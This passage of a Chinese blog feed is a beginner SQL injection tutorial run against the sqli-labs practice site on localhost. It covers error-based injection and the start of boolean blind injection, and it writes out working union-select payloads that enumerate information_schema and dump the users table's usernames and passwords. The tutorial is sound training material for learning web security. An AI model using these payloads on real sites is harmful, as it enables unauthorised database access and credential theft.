<p>那么后端查询语句可能是这样：<br><code>SELECT * FROM 某张表 WHERE username='zhangsan' AND password='123';</code><br>如果用户名和密码都正确，就会返回这些内容。（当然会经过处理，一般不是直接看一张表）<br>当然，查询语句也可能是<code>SELECT * FROM 某张表 WHERE username="zhangsan" AND   password="123";</code><br>或者是<code>SELECT * FROM 某张表 WHERE username=（'zhangsan'）AND password=      （'123'）;</code><br>或者<code>SELECT * FROM 某张表 WHERE username=（"zhangsan"）AND password="123";</code><br>或是其他形式，这取决于开发人员如何将参数封装起来。</p>
</li>
<li><p>如果参数用单引号封装，输入<code>zhangsan'</code>会发生什么？<br>后端查询语句就变成：<code>SELECT * FROM 某张表 WHERE username='zhangsan'' AND password='123';</code><br>显然<code>'zhangsan''</code>这里多了一个单引号，发生了错误。在前端有报错回显的时候，这条语句的报错就直接显示在我们的浏览器上了。</p>
</li>
<li><p>除了去掉这个多余的单引号，还有什么方法能不报错呢？<br>这时候我们就要用到之前讲的<strong>注释</strong>了。<br>假如我们输入<code>zhangsan'--+</code>或者<code>zhangsan'# </code>，后端查询语句就变成了：<br><code>SELECT * FROM 某张表 WHERE username='zhangsan' --+' AND password='123';</code><br>或者<code>SELECT * FROM 某张表 WHERE username='zhangsan' #' AND password='123';</code><br>我们知道，被注释掉的内容是不会被执行的，因此上述语句如果忽略注释的内容就成了：<br><code>SELECT * FROM 某张表 WHERE username='zhangsan'</code><br>单引号就闭合了！这条语句是完全正确的！</p>
</li>
<li><p>上面这条语句只有用户名也能查询吗？<br>如果开发人员没有进行过滤筛查，那么答案是肯定的！也就是说我们通过注释的方式，修改了SQL语句，使得我们用非正常的方式查询到了数据，这其实就是SQL注入的原理了。</p>
</li>
</ul>
<h2 id="开始实践"><a href="#开始实践" class="headerlink" title="开始实践"></a>开始实践</h2><h3 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>准备工作</h3><p>我们打开PHPstudy面板将服务开启</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e786ddfd57.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e786ddfd57.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e786ddfd57.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>在浏览器中输入<code>localhost/sqli/Less-1</code>，注意将sqli改成你设置的文件夹名称。这样我们就来到了第一课。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e787e2129e.png" data-fancybox="one" data-caption="2"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e787e2129e.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e787e2129e.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="2"></a><span class="image-caption">2</span></div></div>
<p>根据提示”请输入ID作为数值参数“，加上这关是GET方式传参（关卡的信息可以看到）。所以我们在地址栏URL末尾加上?id=1，意思是通过GET方式传递一个数值为1的参数。回车，观察页面显示：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e7885e0655.png" data-fancybox="one" data-caption="3"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e7885e0655.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e7885e0655.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="3"></a><span class="image-caption">3</span></div></div>
<p>可以看到页面显示了登录名和密码。接下来我们增大id值2,3,4……一直到14，发现都显示了登录名和密码，但大于14之后不再显示。这是怎么回事？我们联系后端查询语句可以知道，这说明这张表有14个id对应了14条不同的记录（行)。我们已经获得了这张表的一些信息。</p>
<h3 id="破坏查询"><a href="#破坏查询" class="headerlink" title="破坏查询"></a>破坏查询</h3><p>接下来我们要<strong>破坏查询</strong>。记得之前说的在值后面加一个单引号会发生什么吗？<br>是的，会报错。<br>我们尝试输入将1改成1’。页面显示如下：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e789228111.png" data-fancybox="one" data-caption="4"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e789228111.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e789228111.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="4"></a><span class="image-caption">4</span></div></div>
<p>当然这里单引号被转换为了URL编码，可以参考之前在基础知识里提到的<a href="https://www.w3school.com.cn/tags/html_ref_urlencode.asp">文章</a>。<br>现在我们分析这条报错语句，提示的是<code>near ''1'' LIMIT 0,1' at line 1</code>这里有一个语法错误。这里的语句内容使用单引号包裹起来的，因此我们先去除最外层的单引号，可以知道后端查询语句这部分为：<br><code>'1'' LIMIT 0,1</code><br>而我们输入的是1’，把这个值也去掉就会发现，我们输入的参数是被单引号包裹起来的。这样我们就判断出了注入的类型按参数分是单引号型。<br>如果你觉得使用单引号来判断注入类型看得不清楚，可以使用转义字符<code>\</code>来判断。<br>将参数改为<code>1\</code>。页面显示如下：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e789b6bde7.png" data-fancybox="one" data-caption="5"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e789b6bde7.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e789b6bde7.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="5"></a><span class="image-caption">5</span></div></div>
<p>这样，转义字符<code>\</code>后的字符就是将参数封装起来的字符。<br>值得一提的是，并非所有参数都由单引号封装。我们可以尝试用同样的方法去破坏LESS2,3,4,5,6的查询。结果分别如下图：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e78a48ad3a.png" data-fancybox="one" data-caption="LESS2"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e78a48ad3a.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e78a48ad3a.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="LESS2"></a><span class="image-caption">LESS2</span></div></div>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e78b145e1e.png" data-fancybox="one" data-caption="LESS3"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e78b145e1e.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e78b145e1e.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="LESS3"></a><span class="image-caption">LESS3</span></div></div>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e78bbbc559.png" data-fancybox="one" data-caption="LESS4"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e78bbbc559.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e78bbbc559.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="LESS4"></a><span class="image-caption">LESS4</span></div></div>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e78c3ee3ad.png" data-fancybox="one" data-caption="LESS5"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e78c3ee3ad.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e78c3ee3ad.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="LESS5"></a><span class="image-caption">LESS5</span></div></div>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e78cdf01b8.png" data-fancybox="one" data-caption="LESS6"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e78cdf01b8.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e78cdf01b8.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="LESS6"></a><span class="image-caption">LESS6</span></div></div>
<p>通过分析报错语句我们可以知道2中的参数是裸露的，没有用任何字符封装，3用<code>')</code>封装，4用<code>")</code>封装，5用<code>'</code>封装，6用<code>"</code>封装。</p>
<h3 id="消除语法错误"><a href="#消除语法错误" class="headerlink" title="消除语法错误"></a>消除语法错误</h3><p>知道了注入的参数是被什么字符封装起来的以后，我们就要考虑去除语法错误。<br>在前面我们已经讲过如何去除语法错误了。我们回到LESS1进行实验。<br>在地址栏URL末尾输入<code>?id=1--+</code><br>或者<code>?id=1'--%20</code>（%20 URL编码为空格）<br>或者<code>?id=1'%23</code>（%23 URL编码为 # ）</p>
<p>输入<code>?id=1</code>时后端查询语句我们可以通过报错信息猜测后端查询语句为：</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">from</span> table_name <span class="keyword">WHERE</span> id<span class="operator">=</span><span class="string">'1'</span> LIMIT <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></tbody></table></figure>

<p>那么现在变成了</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">from</span> table_name <span class="keyword">WHERE</span> id<span class="operator">=</span><span class="string">'1'</span><span class="comment">-- ' LIMIT 0,1</span></span><br><span class="line">或者</span><br><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">from</span> table_name <span class="keyword">WHERE</span> id<span class="operator">=</span><span class="string">'1'</span>#<span class="string">' LIMIT 0,1</span></span><br></pre></td></tr></tbody></table></figure>

<p>忽略注释掉的内容就是：</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">from</span> table_name <span class="keyword">WHERE</span> id<span class="operator">=</span><span class="string">'1'</span></span><br></pre></td></tr></tbody></table></figure>

<p>这时候单引号被我们闭合了，后面的语句被我们注释掉了，当然仍然能够成功执行！</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e78e0e8616.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e78e0e8616.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e78e0e8616.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>同理，LESS2-6也可以根据参数被封装的类型，使用注释去除语法错误。</p>
<h3 id="添加语句"><a href="#添加语句" class="headerlink" title="添加语句"></a>添加语句</h3><p>我们通过注释的方法减少了原来语句的内容，那我们能否增加我们想要查询的内容呢？当然可以！</p>
<p><code>SELECT * from table_name WHERE id='1'【插入语句】-- ' LIMIT 0,1</code><br>我们在注释前插入语句，就可以增加查询的内容。如何实现呢？<br>我们会想到，在这里再加一条SELECT语句不就完事儿了吗？是的，但我们需要用到之前划重点的<strong>union</strong>。这里就涉及到一个问题，union连接的select语句必须查询字段数相同，但是我们并不知道原来的SELECT查询了多少个字段。我们先要知道查询结果有多少个字段（不一定所有查询结果都会显示再页面上，所以从页面上得不到信息）。<br>这时候就要用到<strong>order by</strong>了。我们在插入语句的地方加上<code>order by 1</code>，如下图：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e78ec111e1.png" data-fancybox="one" data-caption="12"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e78ec111e1.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e78ec111e1.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="12"></a><span class="image-caption">12</span></div></div>
<p><code>order by 1</code>表示按照查询结果的第一列进行排序。页面显示正确，说明查询结果有第一列（废话）。我们再增大列数，一直到<code>order by 4</code>，出现了报错：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e78f5338e1.png" data-fancybox="one" data-caption="13"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e78f5338e1.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e78f5338e1.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="13"></a><span class="image-caption">13</span></div></div>
<p>提示没有第4列，因此我们得到查询结果有且仅有3列。这时候就可以用<strong>union</strong>了。<br>新的问题来了，我们查询了3列，但每次改变id只改变了login name和password后面的内容，这不是两列吗？<br>的确是两列，因为经过开发人员处理，回显给我们的是3列中的两列。因此我们要判断显示的是哪两列。<br>这里先讲一下字面量的概念。我们之前说select后面加的是字段名，这时候会查询相应的列。但如果我们select 1,2,3呢？这时候并不是查询第1,2,3列，而是直接查询出来这几个数字1,2,3。这些数字就叫做字面量。利用查询字面量的方式我们可以判断回显了第几列。<br>试想一下，select 1,2,3这个语句被执行。页面上如果显示：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">Your Login name:1</span><br><span class="line">Your Password:2</span><br></pre></td></tr></tbody></table></figure>

<p>这不就代表页面回显了查询结果的第1，2列吗？<br>因此我们会想到在插入语句处加上<code>union select 1,2,3</code>。但是发现页面回显没有变化。这是因为总共只显示了id=1对应的两条记录。union后面的语句查询到了也没地方显示了。<br>只要让union之前的语句什么都查不到，就可以显示union后面的语句了！<br>也就是让where后面的条件对应不上表里的内容，我们可以将id改成0（或者负数，比记录数14还大的数），毕竟很有可能没有id=0的记录。也就是url末尾改成<code>?id=0' union select 1,2,3--+</code>，如图：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e78fe02919.png" data-fancybox="one" data-caption="14"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e78fe02919.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e78fe02919.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="14"></a><span class="image-caption">14</span></div></div>
<p>发现页面回显2，3。说明页面回显了查询结果的第2，3列。这时候我们就可以把我们想要查询的数据放在第2，3列的位置，页面就会回显出来给我们。<br>通常来说，我们可能会想要获取的基本信息有：数据库类型、版本号，当前数据库名称，当前执行查询的用户名……通常都有相应的函数或常量来查询这些基本信息。下表给出了部分函数或常量：</p>
<table>
<thead>
<tr>
<th>函数或常量名</th>
<th>返回值</th>
</tr>
</thead>
<tbody><tr>
<td>system_user()</td>
<td>系统用户名</td>
</tr>
<tr>
<td>user()</td>
<td>用户名</td>
</tr>
<tr>
<td>current_user()</td>
<td>当前用户名</td>
</tr>
<tr>
<td>session_user()</td>
<td>链接数据库的用户名</td>
</tr>
<tr>
<td>database()</td>
<td>当前使用的数据库名</td>
</tr>
<tr>
<td>version()</td>
<td>数据库版本</td>
</tr>
<tr>
<td>@@datadir</td>
<td>数据库目录</td>
</tr>
<tr>
<td>@@tmpdir</td>
<td>操作系统缓存的临时目录</td>
</tr>
</tbody></table>
<p>这里以获取数据库版本和当前数据库名为例<br>将<code>1,2,3</code>改为<code>1,version(),database()</code>，得到如下结果：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e79097c50e.png" data-fancybox="one" data-caption="15"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e79097c50e.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e79097c50e.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="15"></a><span class="image-caption">15</span></div></div>
<p>之前讲了数据库指纹，通过之前的报错信息我们可以知道使用的是MySQL数据库，结合此处5.7.26可知使用的是MySQL5.7.26版本，当前使用的数据库是security。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e79119d0ce.png" data-fancybox="one" data-caption="16"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e79119d0ce.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e79119d0ce.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="16"></a><span class="image-caption">16</span></div></div>
<p>从PHPStudy面板来看，的确如此。</p>
<h3 id="获取敏感信息"><a href="#获取敏感信息" class="headerlink" title="获取敏感信息"></a>获取敏感信息</h3><p>但光知道这点信息我们肯定不满足啊，我们肯定想知道当前数据库里有什么敏感信息，比如用户名密码以及用户的其他信息。</p>
<p>这时候要用到之前提到过的information_schema数据库以及其中的tables,columns表。<br>先来解释一下这些内容。</p>
<ul>
<li>information_schema数据库是MySQL自带的数据库。它提供了访问数据库元数据的方式。元数据是关于数据的数据，如数据库名或表名，列的数据类型，或访问权限等。</li>
<li>其中的tables表存储了所有的表名(table_name)，以及表所在的数据库名(table_schema)等信息</li>
<li>其中的columns表存储了所有的字段名(column_name)，以及字段所在的表名(table_name)等信息</li>
</ul>
<p>接下来开始实验：<br>输入<code>?id=0' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+</code>。意思是从information_schema数据库中的tables表查询表名，条件是表所在的数据库是当前数据库。页面显示如下：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e791ddbeab.png" data-fancybox="one" data-caption="17"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e791ddbeab.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e791ddbeab.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="17"></a><span class="image-caption">17</span></div></div>

<p>显示了emails，但数据库不太可能只有这一张表。这是因为开发人员让每一列只显示了一条记录。我们可以在语句后加上LIMIT 数字,1来限制显示第几行。比如加上LIMIT 0,1表示显示第0行，LIMIT 1,1表示显示第1行，第一行显示如下（<code>?id=0' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1--+</code>）：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e792f97ceb.png" data-fancybox="one" data-caption="18"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e792f97ceb.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e792f97ceb.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="18"></a><span class="image-caption">18</span></div></div>
<p>我们当然可以一次次改变limit的第一个参数来获取数据，但还有一种方法让所有记录一起显示出来。就是使用group_concat()这个函数。<br>例如，<code>?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+</code>，页面显示如下：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e793869515.png" data-fancybox="one" data-caption="19"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e793869515.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e793869515.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="19"></a><span class="image-caption">19</span></div></div>
<p>这时候我们发现，所有的表就被列举出来了。我们可以看到这里存储的其实都是一些敏感信息，我们以users表为例去查看里面有哪些字段名。<br>输入<code>?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+</code>。意思是从information_schema数据库中的columns表查询存储的字段名数据，条件是该记录的table_name表名是users。显示结果如下：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e7942ed108.png" data-fancybox="one" data-caption="20"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e7942ed108.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e7942ed108.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="20"></a><span class="image-caption">20</span></div></div>
<p>东西很多，我们就看看用户名和密码吧<br>输入<code>?id=0' union select 1,group_concat(username),group_concat(password) from users--+</code>。意思是从当前数据库（security）中的users表查询其中的username列和password列。显示如下：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e794c9cba5.png" data-fancybox="one" data-caption="21"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e794c9cba5.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e794c9cba5.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="21"></a><span class="image-caption">21</span></div></div>
<p>可以看到用户名和密码就一一对应地显示出来了！我们的目标基本就达到了!<br>当然这仅仅是以LESS1为例查询了部分信息，有兴趣的朋友可以尝试2-6关、查询其他的一些数据（因为是演示项目有些表里面可能没有数据)</p>
<h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>至此，我们对于基于报错的注入的学习就结束了。原理非常简单，但是需要练习来消化一下。<br>下一期的内容我们讲解布尔盲注，也就是LESS8。LESS7是将查询的内容输出为文件，不涉及注入的原理，我们就跳过了。<br>可以通过<a href="https://bowenyoung.cf/atom.xml">RSS订阅本篇博客</a>来更早获知更新信息。也欢迎在博文下方留言或者<a href="mailto:yys958257943@gmail.com">邮箱</a>联系我！</p>
]]></content>
      <categories>
        <category>Web安全</category>
      </categories>
      <tags>
        <tag>SQL注入</tag>
      </tags>
  </entry>
  <entry>
    <title>SQL注入新手教程（三）——布尔盲注</title>
    <url>/posts/sqli3/</url>
    <content><![CDATA[<p>在<a href="../../posts/sqli2/">上一期教程</a>中我们学习了基于报错的注入，或者准确地说是GET型基于报错的注入。相信大家也看出来了，这种注入是非常简单的，意味着这种漏洞是非常低级的。我们所见到的大多数网站中都不会出现如此低级的SQL注入漏洞。更多时候页面是不会回显报错语句的，这时候事情就变复杂了。我们无法直接看到报错语句，就需要通过估计不同的查询结果是TRUE还是FALSE来判断某个数据库是否能够注入，这就是盲注！</p>
<h2 id="布尔盲注原理"><a href="#布尔盲注原理" class="headerlink" title="布尔盲注原理"></a>布尔盲注原理</h2><p>之所以叫盲注，是因为我们在注入的过程中不会看到后端的错误返回语句。此时，如果我们执行的语句返回值为1，页面的显示是一种模样，如果为0，那么页面的显示是另一种模样。利用这样的特性，我们可以在SQL语句中加入逻辑表达式、关系表达式，不断试错，从而理论上能够解得我们所需要的数据，这和猜解密码有点相似。</p>
<h2 id="判断数据库是否能被布尔盲注"><a href="#判断数据库是否能被布尔盲注" class="headerlink" title="判断数据库是否能被布尔盲注"></a>判断数据库是否能被布尔盲注</h2><p>依然，我们首先打开PHPstudy面板，启动WAMP。<br>在浏览器地址栏输入<a href="http://localhost/sqli/Less-8/?id=1">http://localhost/sqli/Less-8/?id=1</a>进入Lesson8（按照你的端口号、目录名等修改）。<br>猜测对应的后端SQL语句为：</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> table_name <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span></span><br></pre></td></tr></tbody></table></figure>

<p>此时页面显示如下：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e7967a8c5d.png" data-fancybox="default" data-caption="有提示文字"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e7967a8c5d.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e7967a8c5d.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="有提示文字"></a><span class="image-caption">有提示文字</span></div></div>

<p>接着我们尝试破坏查询，在地址栏输入</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">http://localhost/sqli/Less-8/?id=1'</span><br></pre></td></tr></tbody></table></figure>

<p>猜测对应的后端SQL语句为：</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> table_name <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span><span class="string">'</span></span><br></pre></td></tr></tbody></table></figure>

<p>发现页面显示如下：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e7972bb2dc.png" data-fancybox="default" data-caption="无提示文字"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e7972bb2dc.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e7972bb2dc.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="无提示文字"></a><span class="image-caption">无提示文字</span></div></div>

<p>观察上图我们可以发现，<code>You are in...</code>这段话不见了，说明这段查询语句是有问题的，即我们破坏查询成功了。但是页面没有回显报错信息，说明我们之前用的显注方法失效了。这时我们便要用到布尔盲注了。</p>
<p>接着我们就继续判断我们传入的参数在后端是如何被封装的。<br>在地址栏输入</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">http://localhost:81/sqli/Less-8/?id=1' and 1=1 --+</span><br></pre></td></tr></tbody></table></figure>

